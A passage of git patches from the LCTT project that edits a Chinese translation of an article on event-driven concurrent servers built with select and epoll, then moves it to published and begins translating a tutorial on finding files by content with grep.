+讲真,所有的轮询都像是无用功。当然操作系统应该是知道哪个套接字是准备好了数据的,因此没必要逐个扫描。事实上,就是这样,接下来就会讲一些 API,让我们可以更优雅地处理多个客户端。 ### select -`select` 的系统调用是轻便的(POSIX),标准 Unix API 中常有的部分。它是为上一节最后一部分描述的问题而设计的 —— 允许一个线程可以监视许多文件描述符 ^[注4][17] 的变化,不用在轮询中执行不必要的代码。我并不打算在这里引入一个关于 `select` 的理解性的教程,有很多网站和书籍讲这个,但是在涉及到问题的相关内容时,我会介绍一下它的 API,然后再展示一个非常复杂的例子。 +`select` 的系统调用是可移植的(POSIX),是标准 Unix API 中常有的部分。它是为上一节最后一部分描述的问题而设计的 —— 允许一个线程可以监视许多文件描述符 ^注4 的变化,而不用在轮询中执行不必要的代码。我并不打算在这里引入一个关于 `select` 的全面教程,有很多网站和书籍讲这个,但是在涉及到问题的相关内容时,我会介绍一下它的 API,然后再展示一个非常复杂的例子。 `select` 允许 _多路 I/O_,监视多个文件描述符,查看其中任何一个的 I/O 是否可用。 @@ -209,30 +207,25 @@ int select(int nfds, fd_set *readfds, fd_set *writefds, `select` 的调用过程如下: 1. 在调用之前,用户先要为所有不同种类的要监视的文件描述符创建 `fd_set` 实例。如果想要同时监视读取和写入事件,`readfds` 和 `writefds` 都要被创建并且引用。 - 2. 用户可以使用 `FD_SET` 来设置集合中想要监视的特殊描述符。例如,如果想要监视描述符 2、7 和 10 的读取事件,在 `readfds` 这里调用三次 `FD_SET`,分别设置 2、7 和 10。 - 3. `select` 被调用。 - 4. 当 `select` 返回时(现在先不管超时),就是说集合中有多少个文件描述符已经就绪了。它也修改 `readfds` 和 `writefds` 集合,来标记这些准备好的描述符。其它所有的描述符都会被清空。 - 5. 这时用户需要遍历 `readfds` 和 `writefds`,找到哪个描述符就绪了(使用 `FD_ISSET`)。 -作为完整的例子,我在并发的服务器程序上使用 `select`,重新实现了我们之前的协议。[完整的代码在这里][18];接下来的是代码中的高亮,还有注释。警告:示例代码非常复杂,因此第一次看的时候,如果没有足够的时间,快速浏览也没有关系。 +作为完整的例子,我在并发的服务器程序上使用 `select`,重新实现了我们之前的协议。[完整的代码在这里][18];接下来的是代码中的重点部分及注释。警告:示例代码非常复杂,因此第一次看的时候,如果没有足够的时间,快速浏览也没有关系。 ### 使用 select 的并发服务器 使用 I/O 的多发 API 诸如 `select` 会给我们服务器的设计带来一些限制;这不会马上显现出来,但这值得探讨,因为它们是理解事件驱动编程到底是什么的关键。 -最重要的是,要记住这种方法本质上是单线程的 ^[注5][19]。服务器实际上在 _同一时刻只能做一件事_。因为我们想要同时处理多个客户端请求,我们需要换一种方式重构代码。 +最重要的是,要记住这种方法本质上是单线程的 ^注5 。服务器实际上在 _同一时刻只能做一件事_。因为我们想要同时处理多个客户端请求,我们需要换一种方式重构代码。 首先,让我们谈谈主循环。它看起来是什么样的呢?先让我们想象一下服务器有一堆任务,它应该监视哪些东西呢?两种类型的套接字活动: 1. 新客户端尝试连接。这些客户端应该被 `accept`。 - 2. 已连接的客户端发送数据。这个数据要用 [第一节][11] 中所讲到的协议进行传输,有可能会有一些数据要被回送给客户端。 -尽管这两种活动在本质上有所区别,我们还是要把他们放在一个循环里,因为只能有一个主循环。循环会包含 `select` 的调用。这个 `select` 的调用会监视上述的两种活动。 +尽管这两种活动在本质上有所区别,我们还是要把它们放在一个循环里,因为只能有一个主循环。循环会包含 `select` 的调用。这个 `select` 的调用会监视上述的两种活动。 这里是部分代码,设置了文件描述符集合,并在主循环里转到被调用的 `select` 部分。 @@ -264,9 +257,7 @@ while (1) { 这里的一些要点: 1. 由于每次调用 `select` 都会重写传递给函数的集合,调用器就得维护一个 “master” 集合,在循环迭代中,保持对所监视的所有活跃的套接字的追踪。 - 2. 注意我们所关心的,最开始的唯一那个套接字是怎么变成 `listener_sockfd` 的,这就是最开始的套接字,服务器借此来接收新客户端的连接。 - 3. `select` 的返回值,是在作为参数传递的集合中,那些已经就绪的描述符的个数。`select` 修改这个集合,用来标记就绪的描述符。下一步是在这些描述符中进行迭代。 ``` @@ -298,7 +289,7 @@ for (int fd = 0; fd <= fdset_max && nready > 0; fd++) { } ``` -这部分循环检查 _可读的_ 描述符。让我们跳过监听器套接字(要浏览所有内容,[看这个代码][20]) 然后看看当其中一个客户端准备好了之后会发生什么。出现了这种情况后,我们调用一个叫做 `on_peer_ready_recv` 的 _回调_ 函数,传入相应的文件描述符。这个调用意味着客户端连接到套接字上,发送某些数据,并且对套接字上 `recv` 的调用不会被阻塞 ^[注6][21]。这个回调函数返回结构体 `fd_status_t`。 +这部分循环检查 _可读的_ 描述符。让我们跳过监听器套接字(要浏览所有内容,[看这个代码][20]) 然后看看当其中一个客户端准备好了之后会发生什么。出现了这种情况后,我们调用一个叫做 `on_peer_ready_recv` 的 _回调_ 函数,传入相应的文件描述符。这个调用意味着客户端连接到套接字上,发送某些数据,并且对套接字上 `recv` 的调用不会被阻塞 ^注6 。这个回调函数返回结构体 `fd_status_t`。 ``` typedef struct { @@ -307,7 +298,7 @@ typedef struct { } fd_status_t; ``` -这个结构体告诉主循环,是否应该监视套接字的读取事件,写入事件,或者两者都监视。上述代码展示了 `FD_SET` 和 `FD_CLR` 是怎么在合适的描述符集合中被调用的。对于主循环中某个准备好了写入数据的描述符,代码是类似的,除了它所调用的回调函数,这个回调函数叫做 `on_peer_ready_send`。 +这个结构体告诉主循环,是否应该监视套接字的读取事件、写入事件,或者两者都监视。上述代码展示了 `FD_SET` 和 `FD_CLR` 是怎么在合适的描述符集合中被调用的。对于主循环中某个准备好了写入数据的描述符,代码是类似的,除了它所调用的回调函数,这个回调函数叫做 `on_peer_ready_send`。 现在来花点时间看看这个回调: @@ -464,37 +455,36 @@ INFO:2017-09-26 05:29:18,070:conn0 disconnecting INFO:2017-09-26 05:29:18,070:conn2 disconnecting ``` -和线程的情况相似,客户端之间没有延迟,他们被同时处理。而且在 `select-server` 也没有用线程!主循环 _多路_ 处理所有的客户端,通过高效使用 `select` 轮询多个套接字。回想下 [第二节中][22] 顺序的 vs 多线程的客户端处理过程的图片。对于我们的 `select-server`,三个客户端的处理流程像这样: +和线程的情况相似,客户端之间没有延迟,它们被同时处理。而且在 `select-server` 也没有用线程!主循环 _多路_ 处理所有的客户端,通过高效使用 `select` 轮询多个套接字。回想下 [第二节中][22] 顺序的 vs 多线程的客户端处理过程的图片。对于我们的 `select-server`,三个客户端的处理流程像这样: ![多客户端处理流程](https://eli.thegreenplace.net/images/2017/multiplexed-flow.png) 所有的客户端在同一个线程中同时被处理,通过乘积,做一点这个客户端的任务,然后切换到另一个,再切换到下一个,最后切换回到最开始的那个客户端。注意,这里没有什么循环调度,客户端在它们发送数据的时候被客户端处理,这实际上是受客户端左右的。 -### 同步,异步,事件驱动,回调 +### 同步、异步、事件驱动、回调 -`select-server` 示例代码为讨论什么是异步编程,它和事件驱动及基于回调的编程有何联系,提供了一个良好的背景。因为这些词汇在并发服务器的(非常矛盾的)讨论中很常见。 +`select-server` 示例代码为讨论什么是异步编程、它和事件驱动及基于回调的编程有何联系,提供了一个良好的背景。因为这些词汇在并发服务器的(非常矛盾的)讨论中很常见。 -让我们从一段 `select` 的手册页面中引用的一句好开始: +让我们从一段 `select` 的手册页面中引用的一句话开始: -> select,pselect,FD_CLR,FD_ISSET,FD_SET,FD_ZERO - 同步 I/O 处理 +> select,pselect,FD\_CLR,FD\_ISSET,FD\_SET,FD\_ZERO - 同步 I/O 处理 因此 `select` 是 _同步_ 处理。但我刚刚演示了大量代码的例子,使用 `select` 作为 _异步_ 处理服务器的例子。有哪些东西? -答案是:这取决于你的观查角度。同步常用作阻塞处理,并且对 `select` 的调用实际上是阻塞的。和第 1、2 节中讲到的顺序的、多线程的服务器中对 `send` 和 `recv` 是一样的。因此说 `select` 是 _同步的_ API 是有道理的。可是,服务器的设计却可以是 _异步的_,或是 _基于回调的_,或是 _事件驱动的_,尽管其中有对 `select` 的使用。注意这里的 `on_peer_*` 函数是回调函数;它们永远不会阻塞,并且只有网络事件触发的时候才会被调用。它们可以获得部分数据,并能够在调用过程中保持稳定的状态。 +答案是:这取决于你的观察角度。同步常用作阻塞处理,并且对 `select` 的调用实际上是阻塞的。和第 1、2 节中讲到的顺序的、多线程的服务器中对 `send` 和 `recv` 是一样的。因此说 `select` 是 _同步的_ API 是有道理的。可是,服务器的设计却可以是 _异步的_,或是 _基于回调的_,或是 _事件驱动的_,尽管其中有对 `select` 的使用。注意这里的 `on_peer_*` 函数是回调函数;它们永远不会阻塞,并且只有网络事件触发的时候才会被调用。它们可以获得部分数据,并能够在调用过程中保持稳定的状态。 -如果你曾经做过一些 GUI 编程,这些东西对你来说应该很亲切。有个 “事件循环”,常常完全隐藏在框架里,应用的 “业务逻辑” 建立在回调上,这些回调会在各种事件触发后被调用,用户点击鼠标,选择菜单,定时器到时间,数据到达套接字,等等。曾经最常见的编程模型是客户端的 JavaScript,这里面有一堆回调函数,它们在浏览网页时用户的行为被触发。 +如果你曾经做过一些 GUI 编程,这些东西对你来说应该很亲切。有个 “事件循环”,常常完全隐藏在框架里,应用的 “业务逻辑” 建立在回调上,这些回调会在各种事件触发后被调用,用户点击鼠标、选择菜单、定时器触发、数据到达套接字等等。曾经最常见的编程模型是客户端的 JavaScript,这里面有一堆回调函数,它们在浏览网页时用户的行为被触发。 ### select 的局限 -使用 `select` 作为第一个异步服务器的例子对于说明这个概念很有用,而且由于 `select` 是很常见,可移植的 API。但是它也有一些严重的缺陷,在监视的文件描述符非常大的时候就会出现。 +使用 `select` 作为第一个异步服务器的例子对于说明这个概念很有用,而且由于 `select` 是很常见、可移植的 API。但是它也有一些严重的缺陷,在监视的文件描述符非常大的时候就会出现。 1. 有限的文件描述符的集合大小。 - 2. 糟糕的性能。 -从文件描述符的大小开始。`FD_SETSIZE` 是一个编译期常数,在如今的操作系统中,它的值通常是 1024。它被硬编码在 `glibc` 的头文件里,并且不容易修改。它把 `select` 能够监视的文件描述符的数量限制在 1024 以内。曾有些分支想要写出能够处理上万个并发访问的客户端请求的服务器,这个问题很有现实意义。有一些方法,但是不可移植,也很难用。 +从文件描述符的大小开始。`FD_SETSIZE` 是一个编译期常数,在如今的操作系统中,它的值通常是 1024。它被硬编码在 `glibc` 的头文件里,并且不容易修改。它把 `select` 能够监视的文件描述符的数量限制在 1024 以内。曾有些人想要写出能够处理上万个并发访问的客户端请求的服务器,所以这个问题很有现实意义。有一些方法,但是不可移植,也很难用。 -糟糕的性能问题就好解决的多,但是依然非常严重。注意当 `select` 返回的时候,它向调用者提供的信息是 “就绪的” 描述符的个数,还有被修改过的描述符集合。描述符集映射着描述符 就绪/未就绪”,但是并没有提供什么有效的方法去遍历所有就绪的描述符。如果只有一个描述符是就绪的,最坏的情况是调用者需要遍历 _整个集合_ 来找到那个描述符。这在监视的描述符数量比较少的时候还行,但是如果数量变的很大的时候,这种方法弊端就凸显出了 ^[注7][23]。 +糟糕的性能问题就好解决的多,但是依然非常严重。注意当 `select` 返回的时候,它向调用者提供的信息是 “就绪的” 描述符的个数,还有被修改过的描述符集合。描述符集映射着描述符“就绪/未就绪”,但是并没有提供什么有效的方法去遍历所有就绪的描述符。如果只有一个描述符是就绪的,最坏的情况是调用者需要遍历 _整个集合_ 来找到那个描述符。这在监视的描述符数量比较少的时候还行,但是如果数量变的很大的时候,这种方法弊端就凸显出了 ^注7 。 由于这些原因,为了写出高性能的并发服务器, `select` 已经不怎么用了。每一个流行的操作系统有独特的不可移植的 API,允许用户写出非常高效的事件循环;像框架这样的高级结构还有高级语言通常在一个可移植的接口中包含这些 API。 @@ -541,30 +531,23 @@ while (1) { } ``` -通过调用 `epoll_ctl` 来配置 `epoll`。这时,配置监听的套接字数量,也就是 `epoll` 监听的描述符的数量。然后分配一个缓冲区,把就绪的事件传给 `epoll` 以供修改。在主循环里对 `epoll_wait` 的调用是魅力所在。它阻塞着,直到某个描述符就绪了(或者超时),返回就绪的描述符数量。但这时,不少盲目地迭代所有监视的集合,我们知道 `epoll_write` 会修改传给它的 `events` 缓冲区,缓冲区中有就绪的事件,从 0 到 `nready-1`,因此我们只需迭代必要的次数。 +通过调用 `epoll_ctl` 来配置 `epoll`。这时,配置监听的套接字数量,也就是 `epoll` 监听的描述符的数量。然后分配一个缓冲区,把就绪的事件传给 `epoll` 以供修改。在主循环里对 `epoll_wait` 的调用是魅力所在。它阻塞着,直到某个描述符就绪了(或者超时),返回就绪的描述符数量。但这时,不要盲目地迭代所有监视的集合,我们知道 `epoll_write` 会修改传给它的 `events` 缓冲区,缓冲区中有就绪的事件,从 0 到 `nready-1`,因此我们只需迭代必要的次数。 要在 `select` 里面重新遍历,有明显的差异:如果在监视着 1000 个描述符,只有两个就绪, `epoll_waits` 返回的是 `nready=2`,然后修改 `events` 缓冲区最前面的两个元素,因此我们只需要“遍历”两个描述符。用 `select` 我们就需要遍历 1000 个描述符,找出哪个是就绪的。因此,在繁忙的服务器上,有许多活跃的套接字时 `epoll` 比 `select` 更加容易扩展。 -剩下的代码很直观,因为我们已经很熟悉 `select 服务器` 了。实际上,`epoll 服务器` 中的所有“业务逻辑”和 `select 服务器` 是一样的,回调构成相同的代码。 +剩下的代码很直观,因为我们已经很熟悉 “select 服务器” 了。实际上,“epoll 服务器” 中的所有“业务逻辑”和 “select 服务器” 是一样的,回调构成相同的代码。 -这种相似是通过将事件循环抽象分离到一个库/框架中。我将会详述这些内容,因为很多优秀的程序员曾经也是这样做的。相反,下一篇文章里我们会了解 `libuv`,一个最近出现的更加受欢迎的时间循环抽象层。像 `libuv` 这样的库让我们能够写出并发的异步服务器,并且不用考虑系统调用下繁琐的细节。 +这种相似是通过将事件循环抽象分离到一个库/框架中。我将会详述这些内容,因为很多优秀的程序员曾经也是这样做的。相反,下一篇文章里我们会了解 libuv,一个最近出现的更加受欢迎的时间循环抽象层。像 libuv 这样的库让我们能够写出并发的异步服务器,并且不用考虑系统调用下繁琐的细节。 * * * - -[注1][1] 我试着在两件事的实际差别中突显自己,一件是做一些网络浏览和阅读,但经常做得头疼。有很多不同的选项,从“他们是一样的东西”到“一个是另一个的子集”,再到“他们是完全不同的东西”。在面临这样主观的观点时,最好是完全放弃这个问题,专注特殊的例子和用例。 - -[注2][2] POSIX 表示这可以是 `EAGAIN`,也可以是 `EWOULDBLOCK`,可移植应用应该对这两个都进行检查。 - -[注3][3] 和这个系列所有的 C 示例类似,代码中用到了某些助手工具来设置监听套接字。这些工具的完整代码在这个 [仓库][4] 的 `utils` 模块里。 - -[注4][5] `select` 不是网络/套接字专用的函数,它可以监视任意的文件描述符,有可能是硬盘文件,管道,终端,套接字或者 Unix 系统中用到的任何文件描述符。这篇文章里,我们主要关注它在套接字方面的应用。 - -[注5][6] 有多种方式用多线程来实现事件驱动,我会把它放在稍后的文章中进行讨论。 - -[注6][7] 由于各种非实验因素,它 _仍然_ 可以阻塞,即使是在 `select` 说它就绪了之后。因此服务器上打开的所有套接字都被设置成非阻塞模式,如果对 `recv` 或 `send` 的调用返回了 `EAGAIN` 或者 `EWOULDBLOCK`,回调函数就装作没有事件发生。阅读示例代码的注释可以了解更多细节。 - -[注7][8] 注意这比该文章前面所讲的异步 polling 例子要稍好一点。polling 需要 _一直_ 发生,而 `select` 实际上会阻塞到有一个或多个套接字准备好读取/写入;`select` 会比一直询问浪费少得多的 CPU 时间。 +- 注1:我试着在做网络浏览和阅读这两件事的实际差别中突显自己,但经常做得头疼。有很多不同的选项,从“它们是一样的东西”到“一个是另一个的子集”,再到“它们是完全不同的东西”。在面临这样主观的观点时,最好是完全放弃这个问题,专注特殊的例子和用例。 +- 注2:POSIX 表示这可以是 `EAGAIN`,也可以是 `EWOULDBLOCK`,可移植应用应该对这两个都进行检查。 +- 注3:和这个系列所有的 C 示例类似,代码中用到了某些助手工具来设置监听套接字。这些工具的完整代码在这个 [仓库][4] 的 `utils` 模块里。 +- 注4:`select` 不是网络/套接字专用的函数,它可以监视任意的文件描述符,有可能是硬盘文件、管道、终端、套接字或者 Unix 系统中用到的任何文件描述符。这篇文章里,我们主要关注它在套接字方面的应用。 +- 注5:有多种方式用多线程来实现事件驱动,我会把它放在稍后的文章中进行讨论。 +- 注6:由于各种非实验因素,它 _仍然_ 可以阻塞,即使是在 `select` 说它就绪了之后。因此服务器上打开的所有套接字都被设置成非阻塞模式,如果对 `recv` 或 `send` 的调用返回了 `EAGAIN` 或者 `EWOULDBLOCK`,回调函数就装作没有事件发生。阅读示例代码的注释可以了解更多细节。 +- 注7:注意这比该文章前面所讲的异步轮询的例子要稍好一点。轮询需要 _一直_ 发生,而 `select` 实际上会阻塞到有一个或多个套接字准备好读取/写入;`select` 会比一直询问浪费少得多的 CPU 时间。 -------------------------------------------------------------------------------- @@ -572,7 +555,7 @@ via: https://eli.thegreenplace.net/2017/concurrent-servers-part-3-event-driven/ 作者:[Eli Bendersky][a] 译者:[GitFuture](https://github.com/GitFuture) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 @@ -587,9 +570,9 @@ via: https://eli.thegreenplace.net/2017/concurrent-servers-part-3-event-driven/ [8]:https://eli.thegreenplace.net/2017/concurrent-servers-part-3-event-driven/#id9 [9]:https://eli.thegreenplace.net/tag/concurrency [10]:https://eli.thegreenplace.net/tag/c-c -[11]:http://eli.thegreenplace.net/2017/concurrent-servers-part-1-introduction/ -[12]:http://eli.thegreenplace.net/2017/concurrent-servers-part-1-introduction/ -[13]:http://eli.thegreenplace.net/2017/concurrent-servers-part-2-threads/ +[11]:https://linux.cn/article-8993-1.html +[12]:https://linux.cn/article-8993-1.html +[13]:https://linux.cn/article-9002-1.html [14]:http://eli.thegreenplace.net/2017/concurrent-servers-part-3-event-driven/ [15]:https://eli.thegreenplace.net/2017/concurrent-servers-part-3-event-driven/#id11 [16]:https://eli.thegreenplace.net/2017/concurrent-servers-part-3-event-driven/#id12 @@ -598,10 +581,10 @@ via: https://eli.thegreenplace.net/2017/concurrent-servers-part-3-event-driven/ [19]:https://eli.thegreenplace.net/2017/concurrent-servers-part-3-event-driven/#id14 [20]:https://github.com/eliben/code-for-blog/blob/master/2017/async-socket-server/select-server.c [21]:https://eli.thegreenplace.net/2017/concurrent-servers-part-3-event-driven/#id15 -[22]:http://eli.thegreenplace.net/2017/concurrent-servers-part-2-threads/ +[22]:https://linux.cn/article-9002-1.html [23]:https://eli.thegreenplace.net/2017/concurrent-servers-part-3-event-driven/#id16 [24]:https://github.com/eliben/code-for-blog/blob/master/2017/async-socket-server/epoll-server.c [25]:https://eli.thegreenplace.net/2017/concurrent-servers-part-3-event-driven/ -[26]:http://eli.thegreenplace.net/2017/concurrent-servers-part-1-introduction/ -[27]:http://eli.thegreenplace.net/2017/concurrent-servers-part-2-threads/ +[26]:https://linux.cn/article-8993-1.html +[27]:https://linux.cn/article-9002-1.html [28]:https://eli.thegreenplace.net/2017/concurrent-servers-part-3-event-driven/#id10 From 2b113411066140b6e613b7755741010bfd7ff31f Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 6 Dec 2017 16:23:03 +0800 Subject: [PATCH 0347/1627] PUB:20171006 Concurrent Servers Part 3 - Event-driven.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @GitFuture 定时发布于周五 https://linux.cn/article-9117-1.html --- .../20171006 Concurrent Servers Part 3 - Event-driven.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20171006 Concurrent Servers Part 3 - Event-driven.md (100%) diff --git a/translated/tech/20171006 Concurrent Servers Part 3 - Event-driven.md b/published/20171006 Concurrent Servers Part 3 - Event-driven.md similarity index 100% rename from translated/tech/20171006 Concurrent Servers Part 3 - Event-driven.md rename to published/20171006 Concurrent Servers Part 3 - Event-driven.md From 11b7923d41f1afeec677b6fe4d24ea1245107777 Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 6 Dec 2017 17:20:20 +0800 Subject: [PATCH 0348/1627] =?UTF-8?q?=E8=A1=A5=E5=85=85=E4=B8=8D=E5=AE=8C?= =?UTF-8?q?=E6=95=B4=E7=9A=84=E5=86=85=E5=AE=B9?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...with a specific text using Linux shell .md | 180 ++++-------------- 1 file changed, 34 insertions(+), 146 deletions(-) diff --git a/sources/tech/20171130 How to find all files with a specific text using Linux shell .md b/sources/tech/20171130 How to find all files with a specific text using Linux shell .md index f5909c27c9..d518dd48db 100644 --- a/sources/tech/20171130 How to find all files with a specific text using Linux shell .md +++ b/sources/tech/20171130 How to find all files with a specific text using Linux shell .md @@ -1,56 +1,38 @@ translating by lujun9972 How to find all files with a specific text using Linux shell ------ -### Objective +### 目标 The following article provides some useful tips on how to find all files within any specific directory or entire file-system containing any specific word or string. -### Difficulty +### 难度 EASY -### Conventions +### 约定 * # - requires given command to be executed with root privileges either directly as a root user or by use of sudo command * $ - given command to be executed as a regular non-privileged user -### Examples +### 案例 -### Find all files with a specific string non-recursively +#### Find all files with a specific string non-recursively -The first command example will search for a string +The first command example will search for a string `stretch` in all files within `/etc/` directory while excluding any sub-directories: -`stretch` - -in all files within - -`/etc/` - -directory while excluding any sub-directories: - -``` +```shell # grep -s stretch /etc/* /etc/os-release:PRETTY_NAME="Debian GNU/Linux 9 (stretch)" /etc/os-release:VERSION="9 (stretch)" ``` -`-s` +The `-s` grep option will suppress error messages about nonexistent or unreadable files. The output shows filenames as well as prints the actual line containing requested string. -grep option will suppress error messages about nonexistent or unreadable files. The output shows filenames as well as prints the actual line containing requested string. +#### Find all files with a specific string recursively -### Find all files with a specific string recursively +The above command omitted all sub-directories. To search recursively means to also traverse all sub-directories. The following command will search for a string `stretch` in all files within `/etc/` directory including all sub-directories: -The above command omitted all sub-directories. To search recursively means to also traverse all sub-directories. The following command will search for a string - -`stretch` - -in all files within - -`/etc/` - -directory including all sub-directories: - -``` +```shell # grep -R stretch /etc/* /etc/apt/sources.list:# deb cdrom:[Debian GNU/Linux testing _Stretch_ - Official Snapshot amd64 NETINST Binary-1 20170109-05:56]/ stretch main /etc/apt/sources.list:#deb cdrom:[Debian GNU/Linux testing _Stretch_ - Official Snapshot amd64 NETINST Binary-1 20170109-05:56]/ stretch main @@ -84,29 +66,10 @@ directory including all sub-directories: /etc/os-release:VERSION="9 (stretch)" ``` -The above +#### Search for all files containing a specific word +The above `grep` command example lists all files containing string `stretch` . Meaning the lines with `stretches` , `stretched` etc. are also shown. Use grep's `-w` option to show only a specific word: -`grep` - -command example lists all files containing string - -`stretch` - -. Meaning the lines with - -`stretches` - -, - -`stretched` - -etc. are also shown. Use grep's - -`-w` - -option to show only a specific word: - -``` +```shell # grep -Rw stretch /etc/* /etc/apt/sources.list:# deb cdrom:[Debian GNU/Linux testing _Stretch_ - Official Snapshot amd64 NETINST Binary-1 20170109-05:56]/ stretch main /etc/apt/sources.list:#deb cdrom:[Debian GNU/Linux testing _Stretch_ - Official Snapshot amd64 NETINST Binary-1 20170109-05:56]/ stretch main @@ -121,17 +84,10 @@ option to show only a specific word: /etc/os-release:VERSION="9 (stretch)" ``` -The above commands may produce an unnecessary output. The next example will only show all file names containing string +#### List only files names containing a specific text +The above commands may produce an unnecessary output. The next example will only show all file names containing string `stretch` within `/etc/` directory recursively: -`stretch` - -within - -`/etc/` - -directory recursively: - -``` +```shell # grep -Rl stretch /etc/* /etc/apt/sources.list /etc/dictionaries-common/words @@ -139,29 +95,10 @@ directory recursively: /etc/os-release ``` -All searches are by default case sensitive which means that any search for a string +#### Perform case-insensitive search +All searches are by default case sensitive which means that any search for a string `stretch` will only show files containing the exact uppercase and lowercase match. By using grep's `-i` option the command will also list any lines containing `Stretch` , `STRETCH` , `StReTcH` etc., hence, to perform case-insensitive search. -`stretch` - -will only show files containing the exact uppercase and lowercase match. By using grep's - -`-i` - -option the command will also list any lines containing - -`Stretch` - -, - -`STRETCH` - -, - -`StReTcH` - -etc., hence, to perform case-insensitive search. - -``` +```shell # grep -Ril stretch /etc/* /etc/apt/sources.list /etc/dictionaries-common/default.hash @@ -170,39 +107,19 @@ etc., hence, to perform case-insensitive search. /etc/os-release ``` -Using +#### Include or Exclude specific files names from search +Using `grep` command it is also possible to include only specific files as part of the search. For example we only would like to search for a specific text/string within configuration files with extension `.conf` . The next example will find all files with extension `.conf` within `/etc` directory containing string `bash` : -`grep` - -command it is also possible to include only specific files as part of the search. For example we only would like to search for a specific text/string within configuration files with extension - -`.conf` - -. The next example will find all files with extension - -`.conf` - -within - -`/etc` - -directory containing string - -`bash` - -: - -``` +```shell # grep -Ril bash /etc/*.conf OR # grep -Ril --include=\*.conf bash /etc/* /etc/adduser.conf ``` -`--exclude` -option we can exclude any specific filenames: +Similarly, using `--exclude` option we can exclude any specific filenames: -``` +```shell # grep -Ril --exclude=\*.conf bash /etc/* /etc/alternatives/view /etc/alternatives/vim @@ -227,57 +144,28 @@ option we can exclude any specific filenames: /etc/skel/.bash_logout ``` -Same as with files grep can also exclude specific directories from the search. Use +#### Exclude specific Directories from search +Same as with files grep can also exclude specific directories from the search. Use `--exclude-dir` option to exclude directory from search. The following search example will find all files containing string `stretch` within `/etc` directory and exclude `/etc/grub.d` from search: -`--exclude-dir` - -option to exclude directory from search. The following search example will find all files containing string - -`stretch` - -within - -`/etc` - -directory and exclude - -`/etc/grub.d` - -from search: - -``` +```shell # grep --exclude-dir=/etc/grub.d -Rwl stretch /etc/* /etc/apt/sources.list /etc/dictionaries-common/words /etc/os-release ``` -By using +#### Display a line number containing searched string +By using `-n` option grep will also provide an information regarding a line number where the specific string was found: -`-n` - -option grep will also provide an information regarding a line number where the specific string was found: - -``` +```shell # grep -Rni bash /etc/*.conf /etc/adduser.conf:6:DSHELL=/bin/bash ``` -The last example will use +#### Find all files not containing a specific string +The last example will use `-v` option to list all files NOT containing a specific keyword. For example the following search will list all files within `/etc/` directory which do not contain string `stretch` : -`-v` - -option to list all files NOT containing a specific keyword. For example the following search will list all files within - -`/etc/` - -directory which do not contain string - -`stretch` - -: - -``` +```shell # grep -Rlv stretch /etc/* ``` From 30ff78e85b4449e1ffd9763af8daf97e052164de Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 6 Dec 2017 19:37:10 +0800 Subject: [PATCH 0349/1627] translated --- ...with a specific text using Linux shell .md | 55 ++++++++++--------- 1 file changed, 29 insertions(+), 26 deletions(-) diff --git a/sources/tech/20171130 How to find all files with a specific text using Linux shell .md b/sources/tech/20171130 How to find all files with a specific text using Linux shell .md index d518dd48db..81938b79fc 100644 --- a/sources/tech/20171130 How to find all files with a specific text using Linux shell .md +++ b/sources/tech/20171130 How to find all files with a specific text using Linux shell .md @@ -1,36 +1,36 @@ -translating by lujun9972 -How to find all files with a specific text using Linux shell +如何在Linux shell中找出所有包含指定文本的文件 ------ ### 目标 -The following article provides some useful tips on how to find all files within any specific directory or entire file-system containing any specific word or string. +本文提供一些关于如何搜索出指定目录或整个文件系统中那些包含指定单词或字符串的文件. ### 难度 -EASY +容易 ### 约定 -* # - requires given command to be executed with root privileges either directly as a root user or by use of sudo command +* \# - 需要使用 root 权限来执行指定命令,可以直接使用 root 用户来执行也可以使用 sudo 命令 -* $ - given command to be executed as a regular non-privileged user +* \$ - 可以使用普通用户来执行指定命令 ### 案例 -#### Find all files with a specific string non-recursively +#### 非递归搜索包含指定字符串的文件 -The first command example will search for a string `stretch` in all files within `/etc/` directory while excluding any sub-directories: +第一个例子让我们来搜索 `/etc/` 目录下所有包含 `stretch` 字符串的文件,但不去搜索其中的子目录: ```shell # grep -s stretch /etc/* /etc/os-release:PRETTY_NAME="Debian GNU/Linux 9 (stretch)" /etc/os-release:VERSION="9 (stretch)" ``` -The `-s` grep option will suppress error messages about nonexistent or unreadable files. The output shows filenames as well as prints the actual line containing requested string. +grep 的 `-s` 选项会在发现不能存在或者不能读取的文件时抑制报错信息. 结果现实除了文件名外还有包含请求字符串的行也被一起输出了. -#### Find all files with a specific string recursively +#### 递归地搜索包含指定字符串的文件 -The above command omitted all sub-directories. To search recursively means to also traverse all sub-directories. The following command will search for a string `stretch` in all files within `/etc/` directory including all sub-directories: +上面案例中忽略了所有的子目录. 所谓递归搜索就是指同时搜索所有的子目录. +下面的命令会在 `/etc/` 及其子目录中搜索包含 `stretch` 字符串的文件: ```shell # grep -R stretch /etc/* @@ -66,8 +66,8 @@ The above command omitted all sub-directories. To search recursively means to al /etc/os-release:VERSION="9 (stretch)" ``` -#### Search for all files containing a specific word -The above `grep` command example lists all files containing string `stretch` . Meaning the lines with `stretches` , `stretched` etc. are also shown. Use grep's `-w` option to show only a specific word: +#### 搜索所有包含特定单词的文件 +上面 `grep` 命令的案例中列出的是所有包含字符串 `stretch` 的文件. 也就是说包含 `stretches` , `stretched` 等内容的行也会被显示. 使用 grep 的 `-w` 选项会只显示包含特定单词的行: ```shell # grep -Rw stretch /etc/* @@ -84,8 +84,8 @@ The above `grep` command example lists all files containing string `stretch` . M /etc/os-release:VERSION="9 (stretch)" ``` -#### List only files names containing a specific text -The above commands may produce an unnecessary output. The next example will only show all file names containing string `stretch` within `/etc/` directory recursively: +#### 显示包含特定文本文件的文件名 +上面的命令都会产生多余的输出. 下一个案例则会递归地搜索 `etc` 目录中包含 `stretch` 的文件并只输出文件名: ```shell # grep -Rl stretch /etc/* @@ -95,8 +95,9 @@ The above commands may produce an unnecessary output. The next example will only /etc/os-release ``` -#### Perform case-insensitive search -All searches are by default case sensitive which means that any search for a string `stretch` will only show files containing the exact uppercase and lowercase match. By using grep's `-i` option the command will also list any lines containing 